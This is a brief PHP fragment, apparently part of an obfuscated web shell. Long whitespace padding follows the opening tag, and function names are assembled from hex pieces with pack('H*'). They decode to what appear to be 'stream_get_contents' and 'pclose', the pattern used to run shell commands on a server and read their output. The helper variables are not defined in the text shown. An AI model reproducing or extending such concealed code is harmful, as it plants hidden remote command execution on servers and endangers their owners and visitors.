<?php																																										
																																										
 
$system6 = pack("H*", $identifier1.'74'.$identifier11.$identifier5.'61'.$identifier12.'5f'.'67'.'65'.$identifier2.$identifier4.'63'.'6f'.'6e'.$identifier2.$identifier5.$identifier10.$identifier2.$identifier1);
$system7 = pack("H*", '70'.'63'.$identifier13.'6f'.$identifier1.'65');





